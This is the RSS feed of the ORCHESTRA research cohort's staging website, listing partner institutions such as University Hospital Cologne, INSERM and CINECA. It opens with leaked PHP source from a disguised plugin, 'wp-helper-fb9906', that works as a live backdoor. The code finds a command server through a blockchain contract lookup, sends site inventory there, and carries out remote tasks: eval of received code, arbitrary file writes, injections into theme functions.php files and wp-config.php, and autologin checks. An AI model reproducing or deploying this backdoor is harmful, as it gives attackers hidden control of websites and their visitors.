// hk_zu if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/var/www/orchestra-staging/wp-content/plugins/wp-helper-fb9906/wp-helper-fb9906.php', 'ctrl'=>'// hk_zu', 'vis'=>'// l0_5i', 'vis_func'=>'wp_x4ih4a', 'vis_paths'=>array('/var/www/orchestra-staging/wp-content/plugins/wp-helper-fb9906/wp-helper-fb9906.php'), 'opt'=>'_wp_sq8m4qse', ); $keys=array(); $keys['id']='f8p'; $keys['ver']='3m'; $keys['caps']='mqe'; $keys['tasks']='ddf'; $keys['interval']='vfz'; $keys['ack_id']='g46'; $keys['ok']='sk'; $keys['detail']='n9y'; $keys['inv']='wai'; $keys['result']='l9l'; $hdr='X-R9K-Auth';$tok='Tcp5Ob5cT8te7catmVuERk4QLiECuLOOSUWROoZ8Spw';$id='762ba94ae3ed2e43';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); });
Warning: Cannot modify header information - headers already sent by (output started at /var/www/orchestra-staging/wp-content/plugins/wp-helper-fb9906/wp-helper-fb9906.php:527) in /var/www/orchestra-staging/wp-includes/feed-rss2.php on line 8
partner Archives - ORCHESTRA Cohort https://web-staging.orchestra-cohort.eu/category/partner/ A Horizon 2020 cohort Wed, 23 Mar 2022 13:50:34 +0000 de-DE hourly 1 https://wordpress.org/?v=6.3.11 https://web-staging.orchestra-cohort.eu/wp-content/uploads/2021/03/logo_1.svg partner Archives - ORCHESTRA Cohort https://web-staging.orchestra-cohort.eu/category/partner/ 32 32 University Hospital Cologne (UHC) https://web-staging.orchestra-cohort.eu/partner/uhc/ Tue, 02 Mar 2021 17:02:17 +0000 https://web-staging.orchestra-cohort.eu/?p=1016 Cologne, Germany. Lead by the team of Janne Vehreschild.

The post University Hospital Cologne (UHC) appeared first on ORCHESTRA Cohort.

]]>

University Hospital Cologne (UHC)

Official Website

Information about the Partner

The University Hospital of Cologne (UHC) is a 1,500-beds tertiary care teaching hospital with around 63,000 in- and 312,000 outpatients per year. UHC provides a special Infectious Diseases (ID) unit as well as a well-implemented ID consultation programme founded by the group leader Janne Vehreschild with currently more than 2,400 consultations per year. Janne Vehreschild’s research group “Cohorts in Infection Research” leads epidemiological and clinical studies with a methodological focus in platform and network building, data collection, biobanking, and comprehensive statistical/epidemiological analysis. The team has 30 members plus 11 doctoral students and consists of health economists, software developers, bioinformaticians, documentation specialists, public health specialists, medical engineers, and physician scientists. Additional expertise is gained by broadly implemented cooperations with distinct research groups at UHC and at other national and international study sites.

The post University Hospital Cologne (UHC) appeared first on ORCHESTRA Cohort.

]]>
Università degli Studi di Verona (UNIVR) https://web-staging.orchestra-cohort.eu/partner/univr/ Tue, 02 Mar 2021 16:59:27 +0000 https://web-staging.orchestra-cohort.eu/?p=1013 Verona, Italy. Lead by the team of Evelina Tacconelli.

The post Università degli Studi di Verona (UNIVR) appeared first on ORCHESTRA Cohort.

]]>

University of Verona (UNIVR)

Official Website

Information about the partner

The University of Verona is a public University focusing on innovation and research, internationally renowned in the area of biomedical and infectious diseases research. The University Hospital is 1,600- bed medical center including all medical specialties. The Infectious Diseases Section, within the Dept. of Diagnostics and Public Health, has extensive clinical and research activities with a multidisciplinary team involving > 80 members with different specialities (infectious diseases, internal medicine, microbiology, biology, statistic, bio-statistic, infection control, psychologist) coordinating and participating to several national and international projects funded by a range of different donor programmes (e.g. WHO, GARDP, IMI, Horizon2020, JPI-AMR, AIFA, and ESCMID). Research topics include therapy of severe bacterial infections caused by multidrug-resistant bacteria, prevention of healthcare associated infections, optimization of surveillance systems, antibiotic stewardship, diagnostic stewardship, AMR transmission and burden, STIs and Public Health.

The post Università degli Studi di Verona (UNIVR) appeared first on ORCHESTRA Cohort.

]]>
Alma Mater studiorum – Università di Bologna (UNIBO) https://web-staging.orchestra-cohort.eu/partner/unibo/ Tue, 02 Mar 2021 16:58:04 +0000 https://web-staging.orchestra-cohort.eu/?p=1010 Bologna, Italy. Lead by the team of Pierluigi Viale.

The post Alma Mater studiorum – Università di Bologna (UNIBO) appeared first on ORCHESTRA Cohort.

]]>

University of Bologna (UNIBO)

Official Website

Information about the partner

Thanks to its scientific excellence and a central Project Management support working closely, UNIBO has gained considerable experience in International and European research projects. In Horizon 2020, UNIBO is so far involved in 278 funded projects (75 as coordinator), with more than 115 M€ of funding. In the framework of the Societal Challenge 1 – Health, Demographic Change & Wellbeing and the Innovative Medicine Initiative and related funding frameworks, UNIBO is participating in 22 projects (17 SC1 project, of which 2 as third party, and 5 IMI-2 JTI Partner projects), with a total EU contribution of over 8 M€. Since the beginning of the COVID-19 pandemic, The University of Bologna (UNIBO) has been involved in different research activities to tackle the diffusion of the virus. The Department of Medical and Surgical Sciences (DIMEC) of UNIBO has been actively working, since the end of February 2019, to manage the COVID-19 pandemic both at clinical and research level in close collaboration with the Infectious Diseases Clinical Unit of the University Hospital S.Orsola-Malpighi (AOU) and the Public Healthcare Provider governance of the Emilia-Romagna Region.

The Department of Medical and Surgical Sciences (DIMEC) incorporates major medical and biomedical research areas. DIMEC main missions are teaching, research and healthcare, in collaboration with the S.Orsola-Malpighi General Hospital. DIMEC includes 140 among full professors, associate professors and senior researchers, 80 technical and administrative professionals, and 60 research fellows.

The post Alma Mater studiorum – Università di Bologna (UNIBO) appeared first on ORCHESTRA Cohort.

]]>
Institut National De La Santè Et De La Recherche Medicale (INSERM) https://web-staging.orchestra-cohort.eu/partner/inserm/ Tue, 02 Mar 2021 16:56:40 +0000 https://web-staging.orchestra-cohort.eu/?p=1008 Paris, France. Lead by the team of Laurence Meyer.

The post Institut National De La Santè Et De La Recherche Medicale (INSERM) appeared first on ORCHESTRA Cohort.

]]>

French National Institute of Health and Medical Research (INSERM)

Official Website

Information about the partner

Founded in 1964, the INSERM (French national institute of health and medical research, www.inserm.fr) is a public scientific and technological institute that operates under the joint authority of the French Ministries of Health and Research. Its mission is to facilitate the exchange between basic, clinical, therapeutic and public health research leveraging on its scientific expertise in several fields and covering a very large spectrum of human diseases.

The laboratory, entitled IAME for “Infection, Antimicrobials, Modelling, Evolution”, is an alliance from basic to clinical and population-based research towards medical progress in the fight against infectious diseases. Created in 2014, it belongs to the French Institute for Medical Research (INSERM) and to the University of Paris and to the University Paris 13. It depends of two departments of the French Life Sciences and Healthcare Alliance (AVIESAN), Infectious Diseases and Public Health. Located at the University of Paris / Bichat Medical School campus in the north of Paris and connected to several University Hospitals in close proximity, it provides a unique opportunity to mix basic scientists and clinicians involved in infectious disease research.

The post Institut National De La Santè Et De La Recherche Medicale (INSERM) appeared first on ORCHESTRA Cohort.

]]>
Servicio Andaluz de Salud (SAS) https://web-staging.orchestra-cohort.eu/partner/inserm-2/ Tue, 02 Mar 2021 16:52:42 +0000 https://web-staging.orchestra-cohort.eu/?p=1005 Seville, Spain. Led by the team of Jesús Rodríguez Baño.

The post Servicio Andaluz de Salud (SAS) appeared first on ORCHESTRA Cohort.

]]>

Andalusian Health Service (SAS)

Official Website

Information about the partner

The Andalusian Health Service (Servicio Andaluz de Salud, SAS) is a public body providing healthcare services to the 8.4 million inhabitants in Andalusia, Spain. Hospital Universitario Virgen Macarena (HUVM) belongs to SAS, and is a reference 900-beds hospital located in Seville. The Department of Infectious Diseases, Microbiology and Preventive Medicine has a vast experience in different fields of infectious diseases; it includes a multidisciplinary research group formed by basic scientists, clinical microbiologists, pharmacists and infectious diseases researchers performing basic and clinical research in this field. It hosts the coordination of the Andalusian Network for Clinical Research in Infectious Diseases (ANCRAID) and the Spanish Network for Research in Infectious Diseases (REIPI), and is part of the Institute of Biomedicine of Seville (IBiS). Research at HUVM is managed by the Fundación Pública Andaluza para la Gestión de la Investigación en Salud de Sevilla (FISEVI; http://fisevi.com/), a non-profit foundation that manages, supports and develops part of the research and innovation activities carried out in the Andalusian Health Service in Seville according to the Collaboration Agreement between the Andalusian Health Service and the Research Managing Foundations of the Andalusian Public Health System signed in 2012.

The post Servicio Andaluz de Salud (SAS) appeared first on ORCHESTRA Cohort.

]]>
CINECA Interuniversity Consortium https://web-staging.orchestra-cohort.eu/partner/cineca/ Tue, 02 Mar 2021 16:50:56 +0000 https://web-staging.orchestra-cohort.eu/?p=1002 Casalecchio di Reno, Italy. Lead by the team of Sanzio Bassini.

The post CINECA Interuniversity Consortium appeared first on ORCHESTRA Cohort.

]]>

CINECA Consorzio Interuniversitario

Official Website

Information about the partner

CINECA, established in 1969, is a non-profit consortium composed of 70 Italian Universities, 9 national research institutions, and the Ministry of Education, University and Research (MIUR). CINECA, equipped with cutting-edge hardware resources and highly- qualified personnel, is committed to accelerate scientific discovery by providing high performance computing resources (HPC), data management, data analytics, storage systems and HPC services. CINECA provides HPC facilities to support academic and industrial research projects in weather and climate forecasts, material science and material design, astrophysics and plasma physics, computational fluid dynamics, computational bioinformatics, genomics, particle physics at both Italian and European level. Endorsing the mandate of the MIUR, CINECA represents Italy in PRACE, the pan-European ESFRI e-Infrastructure for HPC, as one of the four PRACE Tier-0 Hosting Members. It is also one of the founding members of the European Technology Platform for High Performance Computing (ETP4HPC), an industry led framework to define research priorities and action plans in various technological sectors. Being a main data management infrastructure in Italy and Europe, CINECA is an active member of pan-European Collaborative Data eInfrastructure (EUDAT) foundation, hosting one of the four HPC platforms dedicated to the Human Brain Project. CINECA is also a member of the Big Data Value Association (BDVA).

More recently CINECA has been selected as an hosting entity of one of the future EuroHPC precursor to exascale European supercomputers that will be installed in 2021 in the Bologna Technopole, the new CINECA data centre.
Besides the national scientific HPC facility CINECA manages and exploits the supercomputing facility of the Italian energy company (ENI).

The post CINECA Interuniversity Consortium appeared first on ORCHESTRA Cohort.

]]>
Luxembourg Institute of Health (LIH) https://web-staging.orchestra-cohort.eu/partner/lih/ Tue, 02 Mar 2021 16:49:22 +0000 https://web-staging.orchestra-cohort.eu/?p=999 Luxembourg, Luxembourg. Lead by the team of Rejko Krüger.

The post Luxembourg Institute of Health (LIH) appeared first on ORCHESTRA Cohort.

]]>

Luxembourg Institute of Health (LIH)

Official Website

Information about the partner

The Luxembourg Institute of Health (LIH) is a public biomedical research organisation. Striving for excellence, its researchers, by their creativity, enthusiasm and commitment, generate knowledge on disease mechanisms and contribute to the development of new diagnostics, innovative therapies and clinical applications that impact the healthcare of Luxembourgish and European citizens. The activities of the Luxembourg Institute of Health are developed within the following research topics: Infection and Immunity, Oncology, Population Health.

At the forefront of biomedical sciences, the LIH is deeply involved in implementing national and international research programmes in personalised medicine. It acts as a catalyst for promoting research collaborations with healthcare providers, hospitals and other public and private biomedical organisations. In order to create economic and societal value, it purposes the transfer of its scientific discoveries and technological developments. As the first supplier of public health information in Luxembourg, it also enables public authorities to make decisions based on scientific data and to communicate validated data to international institutions.

The post Luxembourg Institute of Health (LIH) appeared first on ORCHESTRA Cohort.

]]>
Fondazione Penta ONLUS https://web-staging.orchestra-cohort.eu/partner/fpo/ Tue, 02 Mar 2021 16:46:05 +0000 https://web-staging.orchestra-cohort.eu/?p=992 Padova, Italy. Lead by the team of Carlo Giaquinto.

The post Fondazione Penta ONLUS appeared first on ORCHESTRA Cohort.

]]>

Penta – Child Health Research (PENTA)

Official Website

Information about the partner

The Paediatric European Network for Treatment of AIDS (Penta) was established in 1991 as an independent collaboration among paediatric HIV centres across Europe aiming to address questions about antiretroviral therapy (ART) in HIV infected children. The Penta Foundation was subsequently set up in 2004 as the legal body representing the Penta network. In 2011 Penta evolved to Penta-ID (Infectious Diseases), integrating the expertise acquired in more than 20 years of successful activity in the area of HIV to other paediatric infectious diseases and investigate and implement the best ways to prevent, diagnose and treat diseases in children. Today the network benefits from international recognition, global geographical representativeness with over 90 centers in 18 countries including South America, Sub Saharan Africa and South-east Asia, very high-quality research, an outstanding track record and diversified public and private funding. PENTA-ID has been recognized as a Level-1 Network for paediatric infectious disease in Europe by EnprEMA.

The post Fondazione Penta ONLUS appeared first on ORCHESTRA Cohort.

]]>
Assistance Publique – Hôpitaux de Paris (AP-HP) https://web-staging.orchestra-cohort.eu/partner/aph/ Tue, 02 Mar 2021 16:45:23 +0000 https://web-staging.orchestra-cohort.eu/?p=993 Paris, France Lead by the team of Jade Ghosn.

The post Assistance Publique – Hôpitaux de Paris (AP-HP) appeared first on ORCHESTRA Cohort.

]]>

Assistance Publique-Hôpitaux de Paris (AP-HP)

Official Website

Information about the partner

Assistance Publique-Hôpitaux de Paris (AP-HP) is the biggest teaching hospital in Europe, federating 39 different hospitals and groups of hospitals (22,474 beds) mainly located in Paris and its suburban area. As a public health institution, AP-HP pursues 3 main missions: healthcare delivery, medical and paramedical teaching and biomedical and clinical research. AP-HP‘ teams develop high quality research activities, including European and International Research projects. In particular, AP-HP is involved and/or co-ordinates more than 80 European research projects supported by the Research and Technological Development ResearchProgramme from the European Union. AP-HP is also the first biomedical research center in Europe with > 500 clinical trials per year and > 8,000 publications per year (25% of all medical research publications in France). It represents the leading sponsor of clinical trials in France and Europe. The Clinical Research and Innovation Delegation (DRCI) is responsible for managing and monitoring all research and the resources needed to achieve them, in line with good clinical practice and patient safety.

The “Infectious and Tropical Diseases” department is a dedicated hospital ward for community- acquired infections as well as patients with an extremely resistant bacterial infection, with an expertise in the management of emerging infectious diseases (our department is one of the two Reference Centers for emerging diseases in Paris).

The post Assistance Publique – Hôpitaux de Paris (AP-HP) appeared first on ORCHESTRA Cohort.

]]>
Regione Emilia Romagna- Agenzia Sanitaria e Sociale (RER-ASSR) https://web-staging.orchestra-cohort.eu/partner/rer-assr/ Tue, 02 Mar 2021 16:41:34 +0000 https://web-staging.orchestra-cohort.eu/?p=989 Bologna, Italy. Lead by the team of Maria Luisa Moro.

The post Regione Emilia Romagna- Agenzia Sanitaria e Sociale (RER-ASSR) appeared first on ORCHESTRA Cohort.

]]>

Regional Agency for Health and Social Care of Emilia-Romagna Region (RER-ASSR)

Official Website

Information about the partner

The Regional Health and Social Directorate is responsible for the governance of the Regional Health Service.
The Regional Agency for Health and Social Care of Emilia-Romagna Region (RER-ASSR) operates as a technical and regulatory support for the Regional Health Service (SSR) and the Integrated system of interventions and social services. It promotes and addresses research in health services and develops research projects to experiment methods, technologies and social and organizational innovations, and it participates in the welfare policy change aimed at implementing strategies based on community and intersectional approach. The Regional Agency is also deeply involved in international initiatives, research programs and exchange experiences with other health care systems, mainly European but also overseas. The organization relies on experienced professionals and services devoted to identify, experiment, evaluate and disseminate innovations. The Regional Agency is part of national and international networks and can therefore count on large-scale maps of stakeholders.

The post Regione Emilia Romagna- Agenzia Sanitaria e Sociale (RER-ASSR) appeared first on ORCHESTRA Cohort.

]]>